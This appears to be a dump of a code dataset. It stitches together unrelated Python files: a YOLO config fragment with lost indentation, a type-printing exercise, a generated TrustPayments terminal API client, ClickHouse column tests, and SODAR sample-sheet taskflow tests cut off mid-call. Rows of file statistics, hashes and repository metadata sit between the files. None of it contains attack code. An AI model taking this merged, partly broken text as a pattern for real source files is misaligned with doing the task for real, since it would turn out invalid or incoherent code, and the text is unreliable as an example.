if (app == 'kangaroo'):
LABELS = ['kangaroo']
COLORS = [(0, 0, 255)]
NORM_H, NORM_W = 320, 320
GRID_H, GRID_W = 10, 10
N_GRID_H, N_GRID_W = int(NORM_H / GRID_H), int(NORM_W / GRID_W)
ANCHORS = [5.03,5.62, 7.29,17.55, 13.27,24.55, 14.30,13.39, 23.19,22.60]
BOX = int(len(ANCHORS) / 2)
CLASS = len(LABELS)
CLASS_WEIGHTS = np.ones(CLASS, dtype='float32')
FILTER = (CLASS + 5) * BOX
THRESHOLD = 0.5
#NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.5, 3.0, 2.0, 2.0
NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.05, 1.0, 10.0, 1.0
TRUE_BOX_BUFFER = 10
WARMUP_BATCHES = 0
DET_TYPE = 'YOLO'
# ann_dir = './dataset/JPG/'
# img_dir = './dataset/JPG/'
ann_dir = './dataset/JPG_Kanga/'
img_dir = './dataset/JPG_Kanga/'
if (app == 'facemask'):
LABELS = ['mask','no-mask']
COLORS = [(0, 0, 255),(255, 0, 0)]
NORM_H, NORM_W = 320, 320
GRID_H, GRID_W = 10, 10
N_GRID_H, N_GRID_W = int(NORM_H / GRID_H), int(NORM_W / GRID_W)
ANCHORS = [5.03,5.62, 7.29,17.55, 13.27,24.55, 14.30,13.39, 23.19,22.60]
BOX = int(len(ANCHORS) / 2)
CLASS = len(LABELS)
CLASS_WEIGHTS = np.ones(CLASS, dtype='float32')
FILTER = (CLASS + 5) * BOX
THRESHOLD = 0.5
#NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.5, 3.0, 2.0, 2.0
NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.1, 1.0, 5.0, 1.0
TRUE_BOX_BUFFER = 10
WARMUP_BATCHES = 0
DET_TYPE = 'YOLO'
# ann_dir = './dataset/JPG/'
# img_dir = './dataset/JPG/'
ann_dir = './dataset/JPG_Kanga/'
img_dir = './dataset/JPG_Kanga/'
if (app == 'raccoon'):
LABELS = ['raccoon']
COLORS = [(0, 0, 255)]
NORM_H, NORM_W = 320, 320
GRID_H, GRID_W = 10, 10
N_GRID_H, N_GRID_W = int(NORM_H / GRID_H), int(NORM_W / GRID_W)
ANCHORS = [5.03,5.62, 7.29,17.55, 13.27,24.55, 14.30,13.39, 23.19,22.60]
BOX = int(len(ANCHORS) / 2)
CLASS = len(LABELS)
CLASS_WEIGHTS = np.ones(CLASS, dtype='float32')
FILTER = (CLASS + 5) * BOX
THRESHOLD = 0.5
#NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.5, 3.0, 2.0, 2.0
NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.1, 1.0, 5.0, 1.0
TRUE_BOX_BUFFER = 10
WARMUP_BATCHES = 0
DET_TYPE = 'YOLO'
# ann_dir = './dataset/JPG/'
# img_dir = './dataset/JPG/'
ann_dir = './dataset/JPG_Kanga/'
img_dir = './dataset/JPG_Kanga/'
params = yolo_params(DET_TYPE, LABELS, COLORS, NORM_H, NORM_W, GRID_H, GRID_W, BOX, CLASS, CLASS_WEIGHTS, THRESHOLD,
ANCHORS, NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS, TRUE_BOX_BUFFER, batch_size, WARMUP_BATCHES,img_dir, ann_dir, annformat)
params.print_params()
return params | 40.552511 | 154 | 0.5076 | 1,346 | 8,881 | 3.125557 | 0.10104 | 0.056572 | 0.074162 | 0.068457 | 0.858331 | 0.858331 | 0.858331 | 0.858331 | 0.850963 | 0.850963 | 0 | 0.139112 | 0.325752 | 8,881 | 219 | 155 | 40.552511 | 0.56346 | 0.167436 | 0 | 0.784314 | 0 | 0 | 0.076761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006536 | false | 0 | 0.019608 | 0 | 0.03268 | 0.006536 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
72d0548a89fa05c4da2c53657ca32225b81e57d3 | 82 | py | Python | Manzhula_Oleg_dz_2/task_2_1.py | Zalotny/GB_Python_Basics_Course | 8597368661a74777955f0a7cdc8a24dc1bcae243 | [
"MIT"
] | null | null | null | Manzhula_Oleg_dz_2/task_2_1.py | Zalotny/GB_Python_Basics_Course | 8597368661a74777955f0a7cdc8a24dc1bcae243 | [
"MIT"
] | null | null | null | Manzhula_Oleg_dz_2/task_2_1.py | Zalotny/GB_Python_Basics_Course | 8597368661a74777955f0a7cdc8a24dc1bcae243 | [
"MIT"
] | null | null | null | print(type(15 * 3))
print(type(15 / 3))
print(type(15 // 2))
print(type(15 ** 2))
| 16.4 | 20 | 0.585366 | 16 | 82 | 3 | 0.3125 | 0.75 | 0.916667 | 0.5 | 0.729167 | 0.729167 | 0.729167 | 0 | 0 | 0 | 0 | 0.171429 | 0.146341 | 82 | 4 | 21 | 20.5 | 0.514286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
f42645615c504daa8dc98570a57ca8113f3fd90d | 12,235 | py | Python | trustpayments/api/payment_terminal_till_service_api.py | TrustPayments/python-sdk | 6fde6eb8cfce270c3612a2903a845c13018c3bb9 | [
"Apache-2.0"
] | null | null | null | trustpayments/api/payment_terminal_till_service_api.py | TrustPayments/python-sdk | 6fde6eb8cfce270c3612a2903a845c13018c3bb9 | [
"Apache-2.0"
] | null | null | null | trustpayments/api/payment_terminal_till_service_api.py | TrustPayments/python-sdk | 6fde6eb8cfce270c3612a2903a845c13018c3bb9 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
import six
from trustpayments.api_client import ApiClient
class PaymentTerminalTillServiceApi:
def __init__(self, configuration):
self.api_client = ApiClient(configuration=configuration)
def perform_transaction(self, space_id, transaction_id, terminal_id, **kwargs):
"""Perform Payment Terminal Transaction
Starts a payment terminal transaction and waits for its completion. If the call returns with a long polling timeout status, you may try again. The processing of the transaction will be picked up where it was left off.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.perform_transaction(space_id, transaction_id, terminal_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int space_id: (required)
:param int transaction_id: The ID of the transaction which is used to process with the terminal. (required)
:param int terminal_id: The ID of the terminal which should be used to process the transaction. (required)
:param str language: The language in which the messages should be rendered in.
:return: Transaction
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
kwargs['_request_timeout'] = 90
if kwargs.get('async_req'):
return self.perform_transaction_with_http_info(space_id, transaction_id, terminal_id, **kwargs)
else:
(data) = self.perform_transaction_with_http_info(space_id, transaction_id, terminal_id, **kwargs)
return data
def perform_transaction_with_http_info(self, space_id, transaction_id, terminal_id, **kwargs):
"""Perform Payment Terminal Transaction
Starts a payment terminal transaction and waits for its completion. If the call returns with a long polling timeout status, you may try again. The processing of the transaction will be picked up where it was left off.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.perform_transaction_with_http_info(space_id, transaction_id, terminal_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int space_id: (required)
:param int transaction_id: The ID of the transaction which is used to process with the terminal. (required)
:param int terminal_id: The ID of the terminal which should be used to process the transaction. (required)
:param str language: The language in which the messages should be rendered in.
:return: Transaction
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['space_id', 'transaction_id', 'terminal_id', 'language']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method perform_transaction" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'space_id' is set
if ('space_id' not in params or
params['space_id'] is None):
raise ValueError("Missing the required parameter `space_id` when calling `perform_transaction`")
# verify the required parameter 'transaction_id' is set
if ('transaction_id' not in params or
params['transaction_id'] is None):
raise ValueError("Missing the required parameter `transaction_id` when calling `perform_transaction`")
# verify the required parameter 'terminal_id' is set
if ('terminal_id' not in params or
params['terminal_id'] is None):
raise ValueError("Missing the required parameter `terminal_id` when calling `perform_transaction`")
collection_formats = {}
path_params = {}
query_params = []
if 'space_id' in params:
query_params.append(('spaceId', params['space_id']))
if 'transaction_id' in params:
query_params.append(('transactionId', params['transaction_id']))
if 'terminal_id' in params:
query_params.append(('terminalId', params['terminal_id']))
if 'language' in params:
query_params.append(('language', params['language']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=utf-8'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json;charset=utf-8'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
'/payment-terminal-till/perform-transaction', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Transaction',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def perform_transaction_by_identifier(self, space_id, transaction_id, terminal_identifier, **kwargs):
"""Perform Payment Terminal Transaction (using TID)
Starts a payment terminal transaction and waits for its completion. If the call returns with a long polling timeout status, you may try again. The processing of the transaction will be picked up where it was left off.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.perform_transaction_by_identifier(space_id, transaction_id, terminal_identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int space_id: (required)
:param int transaction_id: The ID of the transaction which is used to process with the terminal. (required)
:param str terminal_identifier: The identifier (aka TID) of the terminal which should be used to process the transaction. (required)
:param str language: The language in which the messages should be rendered in.
:return: Transaction
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
kwargs['_request_timeout'] = 90
if kwargs.get('async_req'):
return self.perform_transaction_by_identifier_with_http_info(space_id, transaction_id, terminal_identifier, **kwargs)
else:
(data) = self.perform_transaction_by_identifier_with_http_info(space_id, transaction_id, terminal_identifier, **kwargs)
return data
def perform_transaction_by_identifier_with_http_info(self, space_id, transaction_id, terminal_identifier, **kwargs):
"""Perform Payment Terminal Transaction (using TID)
Starts a payment terminal transaction and waits for its completion. If the call returns with a long polling timeout status, you may try again. The processing of the transaction will be picked up where it was left off.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.perform_transaction_by_identifier_with_http_info(space_id, transaction_id, terminal_identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int space_id: (required)
:param int transaction_id: The ID of the transaction which is used to process with the terminal. (required)
:param str terminal_identifier: The identifier (aka TID) of the terminal which should be used to process the transaction. (required)
:param str language: The language in which the messages should be rendered in.
:return: Transaction
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['space_id', 'transaction_id', 'terminal_identifier', 'language']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method perform_transaction_by_identifier" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'space_id' is set
if ('space_id' not in params or
params['space_id'] is None):
raise ValueError("Missing the required parameter `space_id` when calling `perform_transaction_by_identifier`")
# verify the required parameter 'transaction_id' is set
if ('transaction_id' not in params or
params['transaction_id'] is None):
raise ValueError("Missing the required parameter `transaction_id` when calling `perform_transaction_by_identifier`")
# verify the required parameter 'terminal_identifier' is set
if ('terminal_identifier' not in params or
params['terminal_identifier'] is None):
raise ValueError("Missing the required parameter `terminal_identifier` when calling `perform_transaction_by_identifier`")
collection_formats = {}
path_params = {}
query_params = []
if 'space_id' in params:
query_params.append(('spaceId', params['space_id']))
if 'transaction_id' in params:
query_params.append(('transactionId', params['transaction_id']))
if 'terminal_identifier' in params:
query_params.append(('terminalIdentifier', params['terminal_identifier']))
if 'language' in params:
query_params.append(('language', params['language']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=utf-8'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json;charset=utf-8'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
'/payment-terminal-till/perform-transaction-by-identifier', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Transaction',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 47.607004 | 225 | 0.66179 | 1,466 | 12,235 | 5.297408 | 0.106412 | 0.027041 | 0.032449 | 0.036055 | 0.952485 | 0.936132 | 0.910894 | 0.907031 | 0.907031 | 0.885913 | 0 | 0.000993 | 0.259583 | 12,235 | 256 | 226 | 47.792969 | 0.856276 | 0.362239 | 0 | 0.742857 | 0 | 0 | 0.250068 | 0.078163 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.021429 | 0 | 0.107143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f4283ce1ba90d6443c13406aaa185fd8261d7fba | 3,197 | py | Python | tests/columns/test_simpleaggregatefunction.py | fasttrack-solutions/clickhouse-driver | 676dfb09f74b8b55bfecaedbe70ddc971e1badd7 | [
"MIT"
] | 823 | 2017-05-16T15:30:15.000Z | 2022-03-31T08:39:04.000Z | tests/columns/test_simpleaggregatefunction.py | fasttrack-solutions/clickhouse-driver | 676dfb09f74b8b55bfecaedbe70ddc971e1badd7 | [
"MIT"
] | 277 | 2017-07-11T11:35:34.000Z | 2022-03-08T06:52:09.000Z | tests/columns/test_simpleaggregatefunction.py | fasttrack-solutions/clickhouse-driver | 676dfb09f74b8b55bfecaedbe70ddc971e1badd7 | [
"MIT"
] | 175 | 2017-10-11T08:41:12.000Z | 2022-03-22T03:59:35.000Z | from enum import IntEnum
from tests.testcase import BaseTestCase
class SimpleAggregateFunctionTestCase(BaseTestCase):
required_server_version = (19, 8, 3)
def test_simple(self):
columns = 'a SimpleAggregateFunction(any, Int32)'
data = [(3, ), (2, )]
with self.create_table(columns):
self.client.execute(
'INSERT INTO test (a) VALUES', data
)
query = 'SELECT * FROM test'
inserted = self.emit_cli(query)
self.assertEqual(
inserted, '3\n2\n'
)
inserted = self.client.execute(query)
self.assertEqual(inserted, data)
def test_nullable(self):
columns = 'a SimpleAggregateFunction(any, Nullable(Int32))'
data = [(3, ), (None, ), (2, )]
with self.create_table(columns):
self.client.execute(
'INSERT INTO test (a) VALUES', data
)
query = 'SELECT * FROM test'
inserted = self.emit_cli(query)
self.assertEqual(
inserted, '3\n\\N\n2\n'
)
inserted = self.client.execute(query)
self.assertEqual(inserted, data)
def test_simple_agg_function(self):
class A(IntEnum):
hello = -1
world = 2
columns = "a SimpleAggregateFunction(anyLast, " \
"Enum8('hello' = -1, 'world' = 2))"
data = [(A.hello,), (A.world,), (-1,), (2,)]
with self.create_table(columns):
self.client.execute(
'INSERT INTO test (a) VALUES', data
)
query = 'SELECT * FROM test'
inserted = self.emit_cli(query)
self.assertEqual(
inserted, (
'hello\n'
'world\n'
'hello\n'
'world\n'
)
)
inserted = self.client.execute(query)
self.assertEqual(
inserted, [
('hello',), ('world',),
('hello',), ('world',)
]
)
def test_simple_agg_function_nullable(self):
class A(IntEnum):
hello = -1
world = 2
columns = "a SimpleAggregateFunction(anyLast, " \
"Nullable(Enum8('hello' = -1, 'world' = 2)))"
data = [(A.hello,), (A.world,), (None,), (-1,), (2,)]
with self.create_table(columns):
self.client.execute(
'INSERT INTO test (a) VALUES', data
)
query = 'SELECT * FROM test'
inserted = self.emit_cli(query)
self.assertEqual(
inserted, (
'hello\n'
'world\n'
'\\N\n'
'hello\n'
'world\n'
)
)
inserted = self.client.execute(query)
self.assertEqual(
inserted, [
('hello',), ('world',),
(None, ),
('hello',), ('world',)
]
)
| 28.544643 | 67 | 0.443541 | 278 | 3,197 | 5.032374 | 0.183453 | 0.057184 | 0.097212 | 0.160114 | 0.836312 | 0.75268 | 0.75268 | 0.75268 | 0.75268 | 0.75268 | 0 | 0.016584 | 0.434157 | 3,197 | 111 | 68 | 28.801802 | 0.756772 | 0 | 0 | 0.622222 | 0 | 0 | 0.165155 | 0.044417 | 0 | 0 | 0 | 0 | 0.088889 | 1 | 0.044444 | false | 0 | 0.022222 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
be39f8ae4422c3257f84c2e9ff44ecc091a1eb9d | 71,458 | py | Python | samplesheets/tests/test_views_taskflow.py | bihealth/sodar-server | 0c6a03c274ab34cd8987280fe97dc8989551d4bd | [
"MIT"
] | null | null | null | samplesheets/tests/test_views_taskflow.py | bihealth/sodar-server | 0c6a03c274ab34cd8987280fe97dc8989551d4bd | [
"MIT"
] | 1 | 2021-05-28T10:59:49.000Z | 2021-06-03T12:30:23.000Z | samplesheets/tests/test_views_taskflow.py | bihealth/sodar-server | 0c6a03c274ab34cd8987280fe97dc8989551d4bd | [
"MIT"
] | null | null | null | """Integration tests for views in the samplesheets Django app with taskflow"""
# NOTE: You must supply 'sodar_url': self.live_server_url in taskflow requests!
from datetime import timedelta
import irods
import os
from django.conf import settings
from django.contrib import auth
from django.contrib.messages import get_messages
from django.test import override_settings
from django.urls import reverse
from django.utils import timezone
from unittest import skipIf
# Projectroles dependency
from projectroles.app_settings import AppSettingAPI
from projectroles.models import SODAR_CONSTANTS
from projectroles.plugins import get_backend_api
from projectroles.tests.test_views_taskflow import TestTaskflowBase
from samplesheets.forms import ERROR_MSG_INVALID_PATH
from samplesheets.models import (
Investigation,
IrodsAccessTicket,
IrodsDataRequest,
)
from samplesheets.tests.test_io import SampleSheetIOMixin, SHEET_DIR
from samplesheets.utils import get_sample_colls
from samplesheets.views import (
TRACK_HUBS_COLL,
IRODS_REQ_CREATE_ALERT_NAME,
)
app_settings = AppSettingAPI()
User = auth.get_user_model()
# SODAR constants
PROJECT_ROLE_OWNER = SODAR_CONSTANTS['PROJECT_ROLE_OWNER']
PROJECT_ROLE_DELEGATE = SODAR_CONSTANTS['PROJECT_ROLE_DELEGATE']
PROJECT_ROLE_CONTRIBUTOR = SODAR_CONSTANTS['PROJECT_ROLE_CONTRIBUTOR']
PROJECT_ROLE_GUEST = SODAR_CONSTANTS['PROJECT_ROLE_GUEST']
PROJECT_TYPE_CATEGORY = SODAR_CONSTANTS['PROJECT_TYPE_CATEGORY']
PROJECT_TYPE_PROJECT = SODAR_CONSTANTS['PROJECT_TYPE_PROJECT']
SUBMIT_STATUS_OK = SODAR_CONSTANTS['SUBMIT_STATUS_OK']
SUBMIT_STATUS_PENDING = SODAR_CONSTANTS['SUBMIT_STATUS_PENDING']
SUBMIT_STATUS_PENDING_TASKFLOW = SODAR_CONSTANTS[
'SUBMIT_STATUS_PENDING_TASKFLOW'
]
# Local constants
APP_NAME = 'samplesheets'
SHEET_PATH = SHEET_DIR + 'i_small.zip'
TASKFLOW_ENABLED = (
True if 'taskflow' in settings.ENABLED_BACKEND_PLUGINS else False
)
TASKFLOW_SKIP_MSG = 'Taskflow not enabled in settings'
BACKENDS_ENABLED = all(
_ in settings.ENABLED_BACKEND_PLUGINS for _ in ['omics_irods', 'taskflow']
)
BACKEND_SKIP_MSG = (
'Required backends (taskflow, omics_irods) ' 'not enabled in settings'
)
TEST_FILE_NAME = 'test1'
TEST_FILE_NAME2 = 'test2'
DUMMY_UUID = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
PUBLIC_USER_NAME = 'user_no_roles'
PUBLIC_USER_PASS = 'password'
class SampleSheetTaskflowMixin:
"""Taskflow helpers for samplesheets tests"""
def _make_irods_colls(self, investigation, request=None):
"""
Create iRODS collection structure for investigation.
:param investigation: Investigation object
:param request: HTTP request object (optional, default=None)
:raise taskflow.FlowSubmitException if submit fails
"""
self.assertEqual(investigation.irods_status, False)
project = investigation.project
values = {
'project_uuid': project.sodar_uuid,
'flow_name': 'sheet_colls_create',
'flow_data': {
'colls': get_sample_colls(investigation),
'public_guest_access': project.public_guest_access,
},
'request': request,
}
if not request:
values['sodar_url'] = self.live_server_url
self.taskflow.submit(**values)
investigation.refresh_from_db()
self.assertEqual(investigation.irods_status, True)
def _make_track_hub_coll(self, session, assay_path, name):
"""
Create iRODS collection for a track hub under assay collection.
"""
track_hubs_path = assay_path + '/TrackHubs'
try:
session.collections.get(track_hubs_path)
except irods.exception.CollectionDoesNotExist:
session.collections.create(track_hubs_path)
track_hub = session.collections.create(track_hubs_path + '/' + name)
return track_hub.path
class SampleSheetPublicAccessMixin:
"""Helpers for sample sheet public access modification with taskflow"""
def set_public_access(self, access):
"""
Set project public access by issuing a project update POST request.
:param access: Bool
"""
with self.login(self.user):
response = self.client.patch(
reverse(
'projectroles:api_project_update',
kwargs={'project': self.project.sodar_uuid},
),
format='json',
data={'public_guest_access': access},
content_type='application/json',
)
self.assertEqual(response.status_code, 200)
self.project.refresh_from_db()
self.assertEqual(self.project.public_guest_access, access)
@skipIf(not TASKFLOW_ENABLED, TASKFLOW_SKIP_MSG)
class TestIrodsCollsCreateView(
SampleSheetIOMixin, SampleSheetPublicAccessMixin, TestTaskflowBase
):
"""Tests for iRODS collection structure creation view with taskflow"""
def setUp(self):
super().setUp()
# Make project with owner in Taskflow and Django
self.project, self.owner_as = self._make_project_taskflow(
title='TestProject',
type=PROJECT_TYPE_PROJECT,
parent=self.category,
owner=self.user,
description='description',
)
# Import investigation
self.investigation = self._import_isa_from_file(
SHEET_PATH, self.project
)
self.study = self.investigation.studies.first()
def test_create_colls(self):
"""Test collection structure creation with taskflow"""
# Assert precondition
self.assertEqual(self.investigation.irods_status, False)
# Issue POST request
values = {
'sodar_url': self.live_server_url
} # HACK: Override callback URL
with self.login(self.user):
response = self.client.post(
reverse(
'samplesheets:collections',
kwargs={'project': self.project.sodar_uuid},
),
values,
)
# Assert redirect
with self.login(self.user):
self.assertRedirects(
response,
reverse(
'samplesheets:project_sheets',
kwargs={'project': self.project.sodar_uuid},
),
)
# Assert sample sheet collection structure state after creation
self.investigation.refresh_from_db()
self.assertEqual(self.investigation.irods_status, True)
# Assert app setting status (should be unset)
self.assertEqual(
app_settings.get_app_setting(
APP_NAME, 'public_access_ticket', project=self.project
),
'',
)
@override_settings(PROJECTROLES_ALLOW_ANONYMOUS=True)
def test_create_colls_anon(self):
"""Test collection structure creation with anonymous project access"""
self.set_public_access(True)
# Assert preconditions
self.assertEqual(self.investigation.irods_status, False)
self.assertEqual(
app_settings.get_app_setting(
APP_NAME, 'public_access_ticket', project=self.project
),
'',
)
# Issue POST request
values = {
'sodar_url': self.live_server_url
} # HACK: Override callback URL
with self.login(self.user):
response = self.client.post(
reverse(
'samplesheets:collections',
kwargs={'project': self.project.sodar_uuid},
),
values,
)
# Assert redirect
with self.login(self.user):
self.assertRedirects(
response,
reverse(
'samplesheets:project_sheets',
kwargs={'project': self.project.sodar_uuid},
),
)
# Assert sample sheet collection structure state after creation
self.investigation.refresh_from_db()
self.assertEqual(self.investigation.irods_status, True)
# Assert app setting status (should be set)
self.assertNotEqual(
app_settings.get_app_setting(
APP_NAME, 'public_access_ticket', project=self.project
),
'',
)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestSampleSheetDeleteView(
SampleSheetIOMixin, SampleSheetTaskflowMixin, TestTaskflowBase
):
"""Tests for sample sheet deletion with taskflow"""
def setUp(self):
super().setUp()
self.irods_backend = get_backend_api('omics_irods')
# Make project with owner in Taskflow and Django
self.project, self.owner_as = self._make_project_taskflow(
title='TestProject',
type=PROJECT_TYPE_PROJECT,
parent=self.category,
owner=self.user,
description='description',
)
# Import investigation
self.investigation = self._import_isa_from_file(
SHEET_PATH, self.project
)
self.study = self.investigation.studies.first()
self.assay = self.study.assays.first()
def test_delete(self):
"""Test sample sheet deleting with taskflow"""
# Assert precondition
self.assertIsNotNone(self.investigation)
# Issue POST request
values = {
'delete_host_confirm': 'testserver',
'sodar_url': self.live_server_url,
}
with self.login(self.user):
response = self.client.post(
reverse(
'samplesheets:delete',
kwargs={'project': self.project.sodar_uuid},
),
values,
)
# Assert sample sheet dir structure state after creation
with self.assertRaises(Investigation.DoesNotExist):
Investigation.objects.get(
project__sodar_uuid=self.project.sodar_uuid
)
# Assert redirect
with self.login(self.user):
self.assertRedirects(
response,
reverse(
'samplesheets:project_sheets',
kwargs={'project': self.project.sodar_uuid},
),
)
def test_delete_files_owner(self):
"""Test sample sheet deleting with files in irods as owner"""
# Create collections and file in iRODS
self._make_irods_colls(self.investigation)
irods = self.irods_backend.get_session()
assay_path = self.irods_backend.get_path(self.assay)
file_path = assay_path + '/' + TEST_FILE_NAME
irods.data_objects.create(file_path)
# Assert precondition
self.assertEqual(irods.data_objects.exists(file_path), True)
# Issue POST request
values = {
'delete_host_confirm': 'testserver',
'sodar_url': self.live_server_url,
}
with self.login(self.user):
response = self.client.post(
reverse(
'samplesheets:delete',
kwargs={'project': self.project.sodar_uuid},
),
values,
)
# Assert sample sheet dir structure state after creation
with self.assertRaises(Investigation.DoesNotExist):
Investigation.objects.get(
project__sodar_uuid=self.project.sodar_uuid
)
# Assert file status
self.assertEqual(irods.data_objects.exists(file_path), False)
# Assert redirect
with self.login(self.user):
self.assertRedirects(
response,
reverse(
'samplesheets:project_sheets',
kwargs={'project': self.project.sodar_uuid},
),
)
def test_delete_files_contributor(self):
"""Test sample sheet deleting with files in irods as contributor"""
# Create contributor user
user_contributor = self.make_user('user_contributor')
self._make_assignment_taskflow(
self.project, user_contributor, self.role_contributor
)
# Create collections and file in iRODS
self._make_irods_colls(self.investigation)
irods = self.irods_backend.get_session()
assay_path = self.irods_backend.get_path(self.assay)
file_path = assay_path + '/' + TEST_FILE_NAME
irods.data_objects.create(file_path)
# Assert precondition
self.assertEqual(irods.data_objects.exists(file_path), True)
# Issue POST request
values = {
'delete_host_confirm': 'testserver',
'sodar_url': self.live_server_url,
}
with self.login(user_contributor):
response = self.client.post(
reverse(
'samplesheets:delete',
kwargs={'project': self.project.sodar_uuid},
),
values,
)
# Assert sample sheet state after creation (should be there)
self.assertIsNotNone(
Investigation.objects.filter(
project__sodar_uuid=self.project.sodar_uuid
).first()
)
# Assert file status (operation should fail)
self.assertEqual(irods.data_objects.exists(file_path), True)
# Assert redirect
with self.login(self.user):
self.assertRedirects(
response,
reverse(
'samplesheets:project_sheets',
kwargs={'project': self.project.sodar_uuid},
),
)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsAccessTicketListView(
SampleSheetTaskflowMixin, SampleSheetIOMixin, TestTaskflowBase
):
"""Tests for the irods access ticket list view"""
def setUp(self):
super().setUp()
# Make project with owner in Taskflow and Django
self.project, self.owner_as = self._make_project_taskflow(
title='TestProject',
type=PROJECT_TYPE_PROJECT,
parent=self.category,
owner=self.user,
description='description',
)
self.investigation = self._import_isa_from_file(
SHEET_PATH, self.project
)
self.study = self.investigation.studies.first()
self.assay = self.study.assays.first()
# Create iRODS collections
self._make_irods_colls(self.investigation)
self.irods_backend = get_backend_api('omics_irods')
self.assertIsNotNone(self.irods_backend)
self.irods_session = self.irods_backend.get_session()
# Create iRODS track hub collections
assay_path = self.irods_backend.get_path(self.assay)
self._make_track_hub_coll(self.irods_session, assay_path, 'track1')
self._make_track_hub_coll(self.irods_session, assay_path, 'track2')
# Create iRODS track hub collections
assay_path = self.irods_backend.get_path(self.assay)
self.track_hub1 = self._make_track_hub_coll(
self.irods_session, assay_path, 'track1'
)
self.track_hub2 = self._make_track_hub_coll(
self.irods_session, assay_path, 'track2'
)
def test_render_empty(self):
"""Test rendering the irods access ticket list view"""
with self.login(self.user):
response = self.client.get(
reverse(
'samplesheets:irods_tickets',
kwargs={'project': self.project.sodar_uuid},
)
)
self.assertEqual(response.status_code, 200)
# Assert context data
self.assertEqual(response.context['object_list'].count(), 0)
def test_render(self):
post_data = {
'path': self.track_hub1,
'date_expires': (timezone.localtime() + timedelta(days=1)).strftime(
'%Y-%m-%d'
),
'label': 'TestTicket',
}
with self.login(self.user):
self.client.post(
reverse(
